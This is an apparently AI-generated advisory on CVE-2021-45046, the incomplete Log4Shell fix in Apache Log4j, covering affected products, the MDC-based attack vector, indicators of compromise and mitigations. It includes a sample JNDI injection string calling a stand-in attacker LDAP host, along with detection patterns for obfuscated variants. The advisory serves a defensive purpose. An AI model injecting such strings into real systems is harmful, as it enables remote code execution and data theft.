CVE-2021-45046 Overview
CVE-2021-45046 is a critical vulnerability in Apache Log4j that represents an incomplete fix for the infamous Log4Shell vulnerability (CVE-2021-44228). The initial patch released in Log4j 2.15.0 failed to fully address the JNDI lookup exploitation vector in certain non-default configurations. Attackers who can control Thread Context Map (MDC) input data can exploit this vulnerability when logging configurations use non-default Pattern Layouts containing Context Lookups ($${ctx:loginId}) or Thread Context Map patterns (%X, %mdc, or %MDC). This allows crafting malicious input using JNDI Lookup patterns, resulting in information leakage and remote code execution in some environments, with local code execution possible in all affected environments.
Critical Impact
This vulnerability enables remote code execution through JNDI injection when applications use non-default logging configurations with Thread Context Map patterns. Listed in CISA's Known Exploited Vulnerabilities catalog, indicating active exploitation in the wild.
Affected Products
- Apache Log4j 2.0 through 2.15.0 (excluding 2.12.2 for Java 7)
- Intel products including OneAPI, Datacenter Manager, System Studio, and Audio Development Kit
- Siemens industrial products including MindSphere, Teamcenter, Industrial Edge Management, and numerous SCADA/ICS systems
- Debian Linux 10.0 and 11.0
- Fedora 34 and 35
- SonicWall Email Security
Discovery Timeline
- December 14, 2021 - CVE-2021-45046 published to NVD
- October 27, 2025 - Last updated in NVD database
Technical Details for CVE-2021-45046
Vulnerability Analysis
This vulnerability stems from an incomplete mitigation of the original Log4Shell vulnerability. While CVE-2021-44228 addressed the most common exploitation scenarios, certain edge cases remained exploitable. The flaw specifically affects applications using non-default Pattern Layout configurations that incorporate Context Lookups or Thread Context Map patterns.
When an application logs data that includes attacker-controlled Thread Context Map values, and the logging configuration uses patterns like %X, %mdc, %MDC, or Context Lookups such as $${ctx:loginId}, the JNDI lookup functionality can still be triggered. This bypasses the protections implemented in version 2.15.0, allowing attackers to force the vulnerable application to make outbound JNDI connections to attacker-controlled servers.
The exploitation mechanics leverage the same underlying JNDI injection technique as CVE-2021-44228, but through a different code path that was not addressed in the initial fix. Successful exploitation can result in information disclosure through DNS-based exfiltration and, in environments where JNDI remote class loading is permitted, full remote code execution.
Root Cause
The root cause is CWE-917 (Improper Neutralization of Special Elements used in an Expression Language Statement). The Log4j 2.15.0 patch restricted message lookup patterns but did not adequately sanitize Thread Context Map data when processed through Pattern Layout configurations. The JNDI lookup mechanism remained accessible through MDC input channels, allowing attackers to inject malicious JNDI URIs that bypass the intended restrictions.
Attack Vector
The attack leverages network-accessible applications that log user-controlled data to Thread Context Maps. An attacker crafts input containing JNDI lookup strings (e.g., ${jndi:ldap://attacker.com/exploit}) and ensures this data flows into the application's Thread Context Map. When the logging subsystem processes this data using vulnerable Pattern Layout configurations, it triggers JNDI resolution, connecting to the attacker's server. The attacker's LDAP/RMI server can then return a malicious Java object reference, leading to code execution when deserialized by the vulnerable application.
The attack requires the target application to have specific logging configuration patterns, making it more constrained than CVE-2021-44228 but still highly dangerous in affected deployments. Industrial control systems and enterprise software using Log4j with MDC logging patterns are particularly at risk.
Detection Methods for CVE-2021-45046
Indicators of Compromise
- Outbound LDAP, LDAPS, RMI, or DNS connections to unexpected external IP addresses or domains from Java applications
- Log entries containing JNDI lookup patterns such as ${jndi:ldap://, ${jndi:rmi://, or obfuscated variants like ${${lower:j}ndi:
- Presence of suspicious Java classes in application classpath or temporary directories that were not part of the original deployment
- Unusual Thread Context Map values in application logs containing nested lookup expressions
Detection Strategies
- Implement network monitoring to detect outbound LDAP (port 389/636) and RMI (port 1099) connections from internal application servers to external destinations
- Deploy application-level logging analysis to identify JNDI lookup patterns in log output, including obfuscated and encoded variants
- Use SentinelOne's behavioral AI to detect anomalous process spawning from Java applications, particularly shell processes or network utilities
- Scan application dependencies using software composition analysis (SCA) tools to identify vulnerable Log4j versions in the classpath
Monitoring Recommendations
- Enable enhanced logging for Java applications to capture Thread Context Map contents and Pattern Layout configurations
- Configure SIEM rules to alert on JNDI-related strings in web application logs, including common obfuscation techniques
- Monitor DNS query logs for lookups containing encoded or unusual subdomain patterns that may indicate data exfiltration attempts
- Implement egress filtering and monitor for policy violations from Java application servers
How to Mitigate CVE-2021-45046
Immediate Actions Required
- Upgrade Apache Log4j to version 2.16.0 or later for Java 8+, or version 2.12.2 for Java 7 environments
- Remove the JndiLookup class from the classpath as an immediate mitigation: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
- Review logging configurations and remove or sanitize Pattern Layout patterns that use Context Lookups or Thread Context Map patterns
- Implement network egress controls to block outbound LDAP, LDAPS, and RMI connections from application servers
Patch Information
Apache has released Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) which completely address this vulnerability by removing support for message lookup patterns and disabling JNDI functionality by default. Organizations should prioritize upgrading to these versions. For detailed patch information, consult the Apache Log4j Security Page. Additional vendor-specific patches are available from Intel Security Advisory Intel-SA-00646, Siemens Security Advisory SSA-714170, and Oracle Critical Patch Update January 2022.
Workarounds
- Remove the JndiLookup class from the log4j-core JAR file to eliminate the JNDI lookup capability entirely
- Set the system property log4j2.formatMsgNoLookups=true (note: this alone is insufficient for CVE-2021-45046 but provides defense-in-depth)
- Configure network-level blocking for outbound LDAP, RMI, and LDAPS traffic from application servers
- Implement Web Application Firewall (WAF) rules to block requests containing JNDI lookup patterns and common obfuscation variants
# Remove JndiLookup class from log4j-core JAR
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
# Set system property to disable message lookups (defense-in-depth)
java -Dlog4j2.formatMsgNoLookups=true -jar application.jar
# Block outbound LDAP/RMI at firewall level
iptables -A OUTPUT -p tcp --dport 389 -j DROP
iptables -A OUTPUT -p tcp --dport 636 -j DROP
iptables -A OUTPUT -p tcp --dport 1099 -j DROP
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
